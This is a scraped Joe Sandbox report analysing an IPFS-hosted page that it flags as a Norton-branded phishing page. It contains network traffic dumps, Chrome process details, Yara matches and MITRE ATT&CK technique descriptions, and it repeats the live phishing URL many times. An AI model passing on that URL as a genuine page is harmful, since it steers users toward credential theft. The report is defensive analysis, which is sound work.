2025-01-14 00:48:58 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 35 48 62 44 32 65 50 6d 30 45 65 33 6d 48 41 74 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 36 35 34 38 36 66 61 31 38 38 31 34 66 31 64 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: 5HbD2ePm0Ee3mHAt.3Context: b65486fa18814f1d
2025-01-14 00:48:58 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:48:58 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 73 77 49 55 57 69 73 66 33 30 36 66 64 67 63 48 75 6c 30 64 6b 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: swIUWisf306fdgcHul0dkA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.6	50014	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:49:03 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 74 38 65 69 50 48 63 38 39 30 2b 63 51 6a 51 39 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 31 36 39 63 34 34 61 33 38 33 65 63 33 33 31 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: t8eiPHc890+cQjQ9.1Context: 9169c44a383ec331
2025-01-14 00:49:03 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:49:04 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 74 38 65 69 50 48 63 38 39 30 2b 63 51 6a 51 39 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 31 36 39 63 34 34 61 33 38 33 65 63 33 33 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 6a 6b 4c 74 76 5a 38 41 57 79 77 55 73 48 66 76 62 45 73 78 7a 6b 54 49 31 65 7a 45 4f 34 48 51 59 61 4a 46 79 7a 77 44 4f 6c 55 55 4f 5a 77 66 42 75 74 71 39 47 48 31 34 7a 6f 32 66 31 65 73 6e 4a 45 70 4c 59 4e 48 33 51 70 49 67 67 36 31 43 37 50 43 6a 50 6d 39 42 76 46 71 76 6e 6d 37 44 30 51 4e 33 6f 37 54 33 48 36 6f Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: t8eiPHc890+cQjQ9.2Context: 9169c44a383ec331<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAejkLtvZ8AWywUsHfvbEsxzkTI1ezEO4HQYaJFyzwDOlUUOZwfButq9GH14zo2f1esnJEpLYNH3QpIgg61C7PCjPm9BvFqvnm7D0QN3o7T3H6o
2025-01-14 00:49:04 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 74 38 65 69 50 48 63 38 39 30 2b 63 51 6a 51 39 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 31 36 39 63 34 34 61 33 38 33 65 63 33 33 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: t8eiPHc890+cQjQ9.3Context: 9169c44a383ec331<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 00:49:04 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:49:04 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 71 49 41 6c 61 75 35 45 45 45 61 35 70 6e 68 59 42 76 69 73 6c 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: qIAlau5EEEa5pnhYBvislA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.6	50015	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:49:16 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 45 51 6f 4f 53 6a 50 37 4f 30 71 4a 53 78 4b 76 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 64 33 63 61 39 61 65 31 65 32 34 30 31 30 63 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: EQoOSjP7O0qJSxKv.1Context: ad3ca9ae1e24010c
2025-01-14 00:49:16 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:49:16 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 45 51 6f 4f 53 6a 50 37 4f 30 71 4a 53 78 4b 76 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 64 33 63 61 39 61 65 31 65 32 34 30 31 30 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 6a 6b 4c 74 76 5a 38 41 57 79 77 55 73 48 66 76 62 45 73 78 7a 6b 54 49 31 65 7a 45 4f 34 48 51 59 61 4a 46 79 7a 77 44 4f 6c 55 55 4f 5a 77 66 42 75 74 71 39 47 48 31 34 7a 6f 32 66 31 65 73 6e 4a 45 70 4c 59 4e 48 33 51 70 49 67 67 36 31 43 37 50 43 6a 50 6d 39 42 76 46 71 76 6e 6d 37 44 30 51 4e 33 6f 37 54 33 48 36 6f Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: EQoOSjP7O0qJSxKv.2Context: ad3ca9ae1e24010c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAejkLtvZ8AWywUsHfvbEsxzkTI1ezEO4HQYaJFyzwDOlUUOZwfButq9GH14zo2f1esnJEpLYNH3QpIgg61C7PCjPm9BvFqvnm7D0QN3o7T3H6o
2025-01-14 00:49:16 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 45 51 6f 4f 53 6a 50 37 4f 30 71 4a 53 78 4b 76 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 64 33 63 61 39 61 65 31 65 32 34 30 31 30 63 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: EQoOSjP7O0qJSxKv.3Context: ad3ca9ae1e24010c
2025-01-14 00:49:17 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:49:17 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 7a 36 78 6c 5a 34 6e 64 69 30 6d 76 61 39 66 2b 76 46 50 65 44 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: z6xlZ4ndi0mva9f+vFPeDg.0Payload parsing failed.

Target ID:	1
Start time:	19:47:51
Start date:	13/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	19:47:56
Start date:	13/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2196,i,7131561303535393596,11780797804919219078,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	19:48:02
Start date:	13/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Source: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q	Joe Sandbox AI: Score: 9 Reasons: The brand 'Norton' is a well-known cybersecurity company., The URL 'ipfs.io' does not match the legitimate domain 'norton.com'., IPFS (InterPlanetary File System) is a decentralized storage network and is not associated with Norton., The use of a decentralized network like IPFS for a brand like Norton is unusual and suspicious., The email input field suggests a login or registration form, which is common in phishing attempts. DOM: 1.1.pages.csv
Source: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q	Joe Sandbox AI: Score: 9 Reasons: Norton is a well-known brand associated with cybersecurity and antivirus software., The URL 'ipfs.io' does not match the legitimate domain 'norton.com'., IPFS (InterPlanetary File System) is a decentralized storage network and is not associated with Norton., The presence of a password input field on a non-legitimate domain is suspicious and indicative of phishing. DOM: 1.2.pages.csv
Source: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q	Joe Sandbox AI: Score: 9 Reasons: The brand 'Norton' is a well-known cybersecurity company., The URL 'ipfs.io' does not match the legitimate domain 'norton.com'., The domain 'ipfs.io' is associated with the InterPlanetary File System (IPFS), which is unrelated to Norton., The presence of an unrelated domain suggests a potential phishing attempt., The input field email 'kk7fi0@xsjcjre.com' does not provide any direct association with Norton. DOM: 1.3.pages.csv

Source: Yara match	File source: 1.2.pages.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML
Source: Yara match	File source: 1.3.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_54, type: DROPPED

Source: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q	HTTP Parser: No <meta name="author".. found
Source: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q	HTTP Parser: No <meta name="author".. found
Source: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q	HTTP Parser: No <meta name="author".. found

Source: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q	HTTP Parser: No <meta name="copyright".. found
Source: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q	HTTP Parser: No <meta name="copyright".. found
Source: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q	HTTP Parser: No <meta name="copyright".. found

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 48

Chrome Cache Entry: 49

Chrome Cache Entry: 50

Chrome Cache Entry: 51

Chrome Cache Entry: 52

Chrome Cache Entry: 53

Chrome Cache Entry: 54

Chrome Cache Entry: 55

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 3204, Parent PID: 6044

General

Windows Analysis Report
https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q